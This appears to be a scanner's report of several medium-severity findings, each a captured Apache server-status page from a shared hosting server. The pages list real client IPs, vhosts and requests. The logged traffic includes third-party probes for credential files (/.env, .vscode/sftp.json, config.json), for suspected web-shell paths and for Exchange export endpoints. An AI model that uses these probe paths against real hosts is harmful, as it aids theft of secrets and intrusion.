      172.71.130.150http/1.1qr.brunch.ws:443GET /storage/food_image/17088542497417_imgce640657459b4ca982b52
      
      0-5262710/0/2377_
      0.003482845610710.00.00298.14
      172.71.134.63http/1.1qr.brunch.ws:443GET /storage/food_image/17162869093901_tiramisu.jpg HTTP/1.1
      
      0-5262710/0/2555_
      0.0034826664440.00.00182.28
      141.101.68.106http/1.1qr.brunch.ws:443GET /storage/food_image/17181907279772_lambrisotto.jpg HTTP/1.1
      
      0-5262710/0/2386_
      0.0034813236430.00.00260.11
      172.69.223.21http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/css/themes/default.min.css HT
      
      0-5262710/0/2407_
      0.0034818828230.00.00420.57
      141.101.97.100http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/alertify.min.js HTTP/1.1
      
      0-5262710/0/2597_
      0.00348329840780.00.00218.97
      51.211.98.231http/1.1garndhabi.org:80GET /api/v1/contact/managers HTTP/1.1
      
      1-5-0/0/2881.
      0.0036516634262140.00.00401.59
      172.71.118.200http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      1-5-0/0/2572.
      0.0036546489740.00.00320.18
      172.69.223.102http/1.1qr.brunch.ws:443GET /assets/js/pages/form-validation.init.js HTTP/1.1
      
      1-5-0/0/2773.
      0.003652626490580.00.00246.47
      172.69.223.159http/1.1qr.brunch.ws:443GET /storage/food_image/17181922587231_penneaurorapasta.jpg HTT
      
      1-5-0/0/2646.
      0.00365286645540.00.00158.56
      172.69.222.218http/1.1qr.brunch.ws:443GET /storage/food_image/17181903751434_pagliaefienoconaragosta.
      
      1-5-0/0/2651.
      0.00365246248040.00.00157.94
      172.71.126.251http/1.1qr.brunch.ws:443GET /storage/food_image/17095844876687_promodoro.jpg HTTP/1.1
      
      1-5-0/0/2622.
      0.00365246998080.00.00285.14
      141.101.95.19http/1.1qr.brunch.ws:443GET /storage/category_image/17098166015403_20.png HTTP/1.1
      
      1-5-0/0/2767.
      0.00365210053530.00.00307.41
      141.101.68.31http/1.1qr.brunch.ws:443GET /storage/category_image/17098162331954_11.png
      Found on 2024-06-18 15:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a8314047976f68

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Tuesday, 18-Jun-2024 18:34:21 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 6
      Parent Server MPM Generation: 5
      Server uptime:  7 days 14 hours 31 minutes 16 seconds
      Server load: 0.01 0.02 0.05
      Total accesses: 639153 - Total Traffic: 73.5 GB - Total Duration: 1644509782
      CPU Usage: u330.17 s19.34 cu2818.08 cs598.64 - .573% CPU load
      .973 requests/sec - 117.3 kB/second - 120.6 kB/request - 2572.95 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 88 idle workers
      __________K_K____________.........................K_K__K_____K__
      ___________.....................................................
      ......................_____________WKK_________.................
      ................................................................
      ...................________________KKW______....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-5262710/1/2756_
      0.03201115304302421630.01.99299.98
      202.86.216.189http/1.1albayan.edu.sa:443GET /imgweb/book/jamealolom.pdf HTTP/1.1
      
      0-5262710/1/2412_
      0.0129038363250.00.01275.43
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718724570.82768511772155761718
      
      0-5262710/2/2463_
      0.041966733104810.00.02341.32
      172.70.203.146http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-5262710/2/2558_
      0.0616223723690.00.01211.48
      66.249.66.83http/1.1albayan.edu.sa:443GET /imgweb/file44/7th-T3-QB%20-%2023.pdf HTTP/1.1
      
      0-5262710/1/2733_
      0.07123455632460.00.02339.47
      94.156.68.8http/1.1sradmin.3dvi.com:443GET /wp-content/plugins/core-plugin/include.php HTTP/1.1
      
      0-5262710/1/2398_
      0.0889423480970.00.02349.01
      94.156.68.8http/1.1sradmin.3dvi.com:443GET /wp-includes/images/include.php HTTP/1.1
      
      0-5262710/1/2711_
      0.088444516180.00.00252.15
      66.249.66.38http/1.1hawsab.me:80GET /?pyg19118.html HTTP/1.1
      
      0-5262710/1/2815_
      0.106433850390.00.01228.81
      216.144.248.24http/1.1php.we3dvi.com:443HEAD / HTTP/1.1
      
      0-5262710/1/2484_
      0.1037113575890.00.01159.19
      162.158.118.118http/1.1adyar.com.sa:80POST / HTTP/1.1
      
      0-5262710/1/2501_
      0.100214071250.00.00542.96
      94.156.68.8http/1.1filter.jawad.com.sa:80GET /wp-content/plugins/core-plugin/include.php HTTP/1.1
      
      0-5262711/1/2730K
      0.11027178740.80.00268.05
      172.71.183.121http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      0-5262710/1/2650_
      0.11039421200.00.07343.24
      172.71.102.77http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-5262711/1/2447K
      0.110190676760.80.00167.73
      172.70.250.253http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-5262710/0/2586_
      0.0034815359150.00.00187.05
      141.101.97.16http/1.1qr.brunch.ws:443GET /storage/food_image/17085196668732_imgd5955e49a1e64fdf9ea4f
      
      0-5262710/0/2798_
      0.0034839159640.00.00514.94
      172.71.127.13http/1.1qr.brunch.ws:443GET /storage/food_image/17088542122493_imgd175258f31ec4e8ea7551
      
      0-5262710/0/2824_
      0.00348186596760.00.00285.78
      141.101.97.84http/1.1qr.brunch.ws:443GET /public/assets/fonts/rb.ttf HTTP/1.1
      
      0-5262710/0/2648_
      0.0034822845970.00.00222.59
      172.71.134.33http/1.1qr.brunch.ws:443GET /storage/food_image/17095827544263_edamcroissant.jpg HTTP/1
      
      0-5262710/0/2480_
      0.0034826283050.00.00321.11
      172.71.135.2http/1.1qr.brunch.ws:443GET /storage/food_image/17088572566240_img6ba5d51d4fb949a39e5e6
      
      0-5262710/0/2524_
      0.0034824555710.00.00214.07
      172.69.223.115http/1.1qr.brunch.ws:443GET /storage/food_image/17088473288673_img3a0124b801a84169b7c46
      
      0-5262710/0/2152_
      0.0034824732690.00.00300.28
      172.71.130.150http/1.1qr.brunch.ws:443GET /storage/food_image/17088542497417_imgce640657459b4ca982b52
      
      0-5262710/0/2377_
      0.003482845610710.00.00298.14
      172.71.134.63http/1.1qr.brunch.ws:443GET /storage/food_image/17162869093901_tiramisu.jpg HTTP/1.1
      
      0-5262710/0/2555_
      0.0034826664440.00.00182.28
      141.101.68.106http/1.1qr.brunch.ws:443GET /storage/food_image/17181907279772_lambrisotto.jpg HTTP/1.1
      
      0-5262710/0/2386_
      0.0034813236430.00.00260.11
      172.69.223.21http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/css/themes/default.min.css HT
      
      0-5262710/0/2407_
      0.0034818828230.00.00420.57
      141.101.97.100http/1.1qr.brunch.ws:443GET /assets/libs/alertifyjs/build/alertify.min.js HTTP/1.1
      
      0-5262710/0/2597_
      0.00348329840780.00.00218.97
      51.211.98.231http/1.1garndhabi.org:80GET /api/v1/contact/managers HTTP/1.1
      
      1-5-0/0/2881.
      0.0036516634262140.00.00401.59
      172.71.118.200http/1.1qr.brunch.ws:443GET /storage/food_image/17088551141700_img60db9211a02345f08b4a9
      
      1-5-0/0/2572.
      0.0036546489740.00.00320.18
      172.69.223.102http/1.1qr.brunch.ws:443GET /assets/js/pages/form-validation.init.js HTTP/1.1
      
      1-5-0/0/2773.
      0.003652626490580.00.00246.47
      172.69.223.159http/1.1qr.brunch.ws:443GET /storage/food_image/17181922587231_penneaurorapasta.jpg HTT
      
      1-5-0/0/2646.
      0.00365286645540.00.00158.56
      172.69.222.218http/1.1qr.brunch.ws:443GET /storage/food_image/17181903751434_pagliaefienoconaragosta.
      
      1-5-0/0/2651.
      0.00365246248040.00.00157.94
      172.71.126.251http/1.1qr.brunch.ws:443GET /storage/food_image/17095844876687_promodoro.jpg HTTP/1.1
      
      1-5-0/0/2622.
      0.00365246998080.00.00285.14
      141.101.95.19http/1.1qr.brunch.ws:443GET /storage/category_image/17098166015403_20.png HTTP/1.1
      
      1-5-0/0/2767.
      0.00365210053530.00.00307.41
      141.101.68.31http/1.1qr.brun
      Found on 2024-06-18 15:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a83140cc675d09

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 21:16:06 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 17 hours 13 minutes 1 second
      Server load: 0.02 0.03 0.05
      Total accesses: 489794 - Total Traffic: 59.9 GB - Total Duration: 1519612624
      CPU Usage: u309.91 s26.21 cu2079.53 cs436.01 - .577% CPU load
      .992 requests/sec - 127.1 kB/second - 128.2 kB/request - 3102.55 ms/request
      23 requests currently being processed, 0 workers gracefully restarting, 177 idle workers
      K______K____________K_____________C__K___________W__K__________K
      ___K_______K________________K_____W_________K_______K________K__
      ______________K____K________________KK___K______________________
      _KKK____........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4183601/58/2036K
      10.9631299098390.910.61227.22
      162.158.154.6http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-4183600/101/1728_
      10.29242135907260.011.53174.17
      176.18.30.94http/1.1
      
      0-4183600/47/1655_
      10.91159577061040.06.94151.61
      5.44.111.112http/1.13dvi.com:443GET /.env HTTP/1.1
      
      0-4183600/105/1787_
      10.92137363089860.07.53155.20
      64.226.65.160http/1.1trynidaa.com:443GET /server HTTP/1.1
      
      0-4183600/119/1948_
      10.84398354937710.07.87307.20
      172.70.203.140http/1.1qr.brunch.ws:443GET /apple-touch-icon-120x120.png HTTP/1.1
      
      0-4183600/93/1654_
      10.9494412582030.011.00180.12
      41.216.188.18http/1.13dvi.com:443GET / HTTP/1.1
      
      0-4183600/48/1938_
      10.2446323596680.01.68134.39
      107.180.118.175http/1.1
      
      0-4183601/68/1999K
      10.97013336550.92.75192.10
      162.158.155.106http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-4183600/80/1653_
      10.9313312813320.03.05109.99
      141.101.76.214http/1.1adyar.com.sa:443GET /public/.env HTTP/1.1
      
      0-4183600/85/1734_
      10.8634214813015590.021.04431.17
      176.18.30.94http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-4183600/156/1849_
      10.92138324738910.05.65235.50
      64.226.65.160http/1.1trynidaa.com:443GET /_all_dbs HTTP/1.1
      
      0-4183600/52/1769_
      10.3013913789580.022.47260.17
      64.226.65.160http/1.1
      
      0-4183600/102/1777_
      10.92141287785360.01.6492.36
      103.42.58.103http/1.1randalift.com.sa:443GET /.env.example HTTP/1.1
      
      0-4183600/106/1719_
      10.824736993948050.01.75147.35
      62.122.184.194http/1.1zed.sa:443GET /contact-us/ HTTP/1.0
      
      0-4183600/148/2004_
      10.82483828065870.04.67447.73
      50.62.185.30http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-4183600/174/1941_
      10.872432793217020.02.97189.96
      40.77.167.9http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AD%D8%AA%D9%88%D9%89%20%D9%85%D9%84%
      
      0-4183600/69/1780_
      10.214924182285870.02.78162.78
      68.178.227.3http/1.1
      
      0-4183600/99/1797_
      10.863322345455580.01.65252.90
      176.18.30.94http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-4183600/155/1801_
      10.94111133749800.04.65165.83
      52.167.144.145http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1678 HTTP/1.1
      
      0-4183600/57/1484_
      10.85351603694440.01.09249.91
      50.87.170.46http/1.13dvi.com:443HEAD /wordpress HTTP/1.1
      
      0-4183601/102/1769K
      10.9611843259610.8100.91228.71
      162.158.158.37http/1.1nidaa.ws:80GET /config.json HTTP/1.1
      
      0-4183600/167/1869_
      10.891723775674200.02.93128.26
      40.77.167.9http/1.1albayan.edu.sa:443GET /imgweb/2/3.pdf HTTP/1.1
      
      0-4183600/110/1790_
      10.96121992564200.03.44170.48
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/file42/11111%20(4).JPG HTTP/1.1
      
      0-4183600/62/1698_
      10.9554217801060.03.27326.44
      194.163.144.192http/1.1akg.sa:443GET /staging/.env HTTP/1.1
      
      0-4183600/110/1839_
      10.834331528527330.02.23158.77
      162.158.129.165http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      1-4183880/122/2142_
      10.0839836631307060.06.65328.65
      172.70.203.131http/1.1qr.brunch.ws:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      1-4183880/114/1829_
      10.14157225482140.05.82172.46
      5.44.111.112http/1.1new-filter.jawad.com.sa:443GET /public/.env HTTP/1.1
      
      1-4183880/100/1982_
      9.951396625206010.02.81171.93
      64.226.65.160http/1.1
      
      1-4183880/107/1747_
      10.22133624720.017.16104.00
      162.158.158.133http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-4183880/48/1888_
      10.19025667280.01.40118.12
      172.70.110.124http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-4183880/51/1828_
      10.15138334054100.08.60184.18
      64.226.65.160http/1.1trynidaa.com:443GET /.DS_Store HTTP/1.1
      
      1-4183880/87/2264_
      10.08348335953640.02.65252.54
      185.191.171.5http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=109 HTTP/1.1
      
      1-4183880/46/1806_
      10.0547210233783360.01.74190.53
      62.122.184.194http/1.1zed.sa:443POST /wp-json/contact-form-7/v1/contact-forms/609/feedback HTTP
      
      1-4183880/64/2098_
      10.11300473577790.01.50134.11
      66.249.66.82http/1.1albayan.edu.sa:443
      Found on 2024-06-16 18:16
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831408060f0b6

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 16-Jun-2024 21:16:03 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 5
      Parent Server MPM Generation: 4
      Server uptime:  5 days 17 hours 12 minutes 58 seconds
      Server load: 0.02 0.03 0.05
      Total accesses: 489775 - Total Traffic: 59.9 GB - Total Duration: 1519612381
      CPU Usage: u309.83 s26.18 cu2079.53 cs436.01 - .577% CPU load
      .991 requests/sec - 127.1 kB/second - 128.2 kB/request - 3102.67 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 191 idle workers
      K____________________________K_______W___________W_____________K
      ____________________________________________K___________________
      ______________K______________________K__________________________
      _K______........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-4183601/58/2036K
      10.9601299098390.910.61227.22
      162.158.154.6http/1.1nidaa.ws:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor
      
      0-4183600/101/1728_
      10.29239135907260.011.53174.17
      176.18.30.94http/1.1
      
      0-4183600/47/1655_
      10.91156577061040.06.94151.61
      5.44.111.112http/1.13dvi.com:443GET /.env HTTP/1.1
      
      0-4183600/105/1787_
      10.92134363089860.07.53155.20
      64.226.65.160http/1.1trynidaa.com:443GET /server HTTP/1.1
      
      0-4183600/119/1948_
      10.84395354937710.07.87307.20
      172.70.203.140http/1.1qr.brunch.ws:443GET /apple-touch-icon-120x120.png HTTP/1.1
      
      0-4183600/93/1654_
      10.9491412582030.011.00180.12
      41.216.188.18http/1.13dvi.com:443GET / HTTP/1.1
      
      0-4183600/48/1938_
      10.2445923596680.01.68134.39
      107.180.118.175http/1.1
      
      0-4183600/67/1998_
      10.8150123336510.02.75192.10
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1718561261.10876703262329101562
      
      0-4183600/80/1653_
      10.9312912813320.03.05109.99
      141.101.76.214http/1.1adyar.com.sa:443GET /public/.env HTTP/1.1
      
      0-4183600/85/1734_
      10.8633914813015590.021.04431.17
      176.18.30.94http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-4183600/156/1849_
      10.92135324738910.05.65235.50
      64.226.65.160http/1.1trynidaa.com:443GET /_all_dbs HTTP/1.1
      
      0-4183600/52/1769_
      10.3013613789580.022.47260.17
      64.226.65.160http/1.1
      
      0-4183600/102/1777_
      10.92138287785360.01.6492.36
      103.42.58.103http/1.1randalift.com.sa:443GET /.env.example HTTP/1.1
      
      0-4183600/106/1719_
      10.824706993948050.01.75147.35
      62.122.184.194http/1.1zed.sa:443GET /contact-us/ HTTP/1.0
      
      0-4183600/148/2004_
      10.82480828065870.04.67447.73
      50.62.185.30http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      0-4183600/174/1941_
      10.872402793217020.02.97189.96
      40.77.167.9http/1.1albayan.edu.sa:443GET /imgweb/1445/%D9%85%D8%AD%D8%AA%D9%88%D9%89%20%D9%85%D9%84%
      
      0-4183600/69/1780_
      10.214894182285870.02.78162.78
      68.178.227.3http/1.1
      
      0-4183600/99/1797_
      10.863282345455580.01.65252.90
      176.18.30.94http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-4183600/155/1801_
      10.94107133749800.04.65165.83
      52.167.144.145http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1678 HTTP/1.1
      
      0-4183600/57/1484_
      10.85348603694440.01.09249.91
      50.87.170.46http/1.13dvi.com:443HEAD /wordpress HTTP/1.1
      
      0-4183600/101/1768_
      10.815631831843259570.0100.91228.71
      52.167.144.25http/1.1albayan.edu.sa:443GET /imgweb/cur1438/1/tafst1.pdf HTTP/1.1
      
      0-4183600/167/1869_
      10.891693775674200.02.93128.26
      40.77.167.9http/1.1albayan.edu.sa:443GET /imgweb/2/3.pdf HTTP/1.1
      
      0-4183600/110/1790_
      10.9691992564200.03.44170.48
      66.249.66.81http/1.1albayan.edu.sa:443GET /imgweb/file42/11111%20(4).JPG HTTP/1.1
      
      0-4183600/62/1698_
      10.9551217801060.03.27326.44
      194.163.144.192http/1.1akg.sa:443GET /staging/.env HTTP/1.1
      
      0-4183600/110/1839_
      10.834301528527330.02.23158.77
      162.158.129.165http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      1-4183880/122/2142_
      10.0839536631307060.06.65328.65
      172.70.203.131http/1.1qr.brunch.ws:443GET /apple-touch-icon-precomposed.png HTTP/1.1
      
      1-4183880/114/1829_
      10.14153225482140.05.82172.46
      5.44.111.112http/1.1new-filter.jawad.com.sa:443GET /public/.env HTTP/1.1
      
      1-4183880/100/1982_
      9.951366625206010.02.81171.93
      64.226.65.160http/1.1
      
      1-4183880/106/1746_
      10.03501793624650.017.10103.93
      68.178.133.139http/1.1sulaimaniya.edu.sa:443POST /xmlrpc.php HTTP/1.1
      
      1-4183881/48/1888K
      10.192256672866.61.40118.12
      172.70.110.124http/1.1nidaa.ws:80GET / HTTP/1.1
      
      1-4183880/51/1828_
      10.15135334054100.08.60184.18
      64.226.65.160http/1.1trynidaa.com:443GET /.DS_Store HTTP/1.1
      
      1-4183880/87/2264_
      10.08345335953640.02.65252.54
      185.191.171.5http/1.1jawad.com.sa:443GET /variable-product-page.php?a=3&i_p=109 HTTP/1.1
      
      1-4183880/46/1806_
      10.0546810233783360.01.74190.53
      62.122.184.194http/1.1zed.sa:443POST /wp-json/contact-form-7/v1/contact-forms/609/feedback HTTP
      
      1-4183880/64/2098_
      10.11297473577790.01.50134.11
      66.249.66.82
      Found on 2024-06-16 18:16
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31d7a83140d7a831405bc34793

      Apache Status
      
      Apache Server Status for www.nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Wednesday, 12-Jun-2024 16:35:33 +03
      Restart Time: Tuesday, 11-Jun-2024 04:03:04 +03
      Parent Server Config. Generation: 3
      Parent Server MPM Generation: 2
      Server uptime:  1 day 12 hours 32 minutes 28 seconds
      Server load: 0.46 0.40 0.41
      Total accesses: 142642 - Total Traffic: 15.9 GB - Total Duration: 169277681
      CPU Usage: u262.57 s39.49 cu404.1 cs83.57 - .6% CPU load
      1.08 requests/sec - 127.0 kB/second - 117.1 kB/request - 1186.73 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 236 idle workers
      ___W___________K______________K_________________________________
      ________K___________________K_____________________K____K_____K__
      ___________________K__K_____________K___________K_______________
      ___________K________K_____________________________________......
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-256230/146/599_
      20.592201296196440.05.9060.40
      47.128.20.242http/1.1daris.live:80GET /bin/admin/social%20icon/facebook.png HTTP/1.1
      
      0-256230/140/503_
      20.44109251564860.010.5771.88
      104.132.250.75http/1.1
      
      0-256230/156/490_
      20.543362771291560.07.4334.32
      40.77.167.76http/1.1albayan.edu.sa:443GET /imgweb/file43/%D8%A8%D9%86%D9%83%20%D8%A7%D8%B3%D8%A6%D9%8
      
      0-256230/206/593W
      20.49001225920.06.2683.41
      172.69.151.221http/1.1nidaa.ws:80GET /server-status HTTP/1.1
      
      0-256230/179/578_
      20.5627401447090.016.8488.90
      195.191.219.131http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=1648&t=195.191.219.132&c=5 HT
      
      0-256230/168/456_
      20.6313234650440.07.1680.81
      17.241.75.116http/1.1albayan.edu.sa:443GET /e_sch/graduates.php HTTP/1.1
      
      0-256230/185/650_
      20.673901263590.025.5458.19
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1435&t=195.191.219.132&c=5 HT
      
      0-256230/137/529_
      20.523844736730.09.9729.78
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1353&t=195.191.219.132&c=5 HT
      
      0-256230/190/533_
      20.6313751043070.011.4321.14
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1428&t=192.99.7.182&c=5 HTTP/
      
      0-256230/231/542_
      20.5335752629750.021.3594.56
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1353&t=65.108.0.71&c=5 HTTP/1
      
      0-256230/145/555_
      20.562620512460.05.9077.69
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1355&t=195.191.219.132&c=5 HT
      
      0-256230/156/515_
      20.667961773640.010.7970.97
      104.132.250.75http/1.1jawad.com.sa:443GET /public/front_resources/vue/contact.js HTTP/1.1
      
      0-256230/162/455_
      20.62203285934950.05.8742.52
      51.252.203.8http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      0-256230/118/449_
      20.5430921865860.05.4660.00
      47.128.25.244http/1.1daris.live:443GET /bin/admin/files/financial.svg HTTP/1.1
      
      0-256230/155/568_
      20.5723703319460.08.5140.24
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1356&t=65.108.0.71&c=5 HTTP/1
      
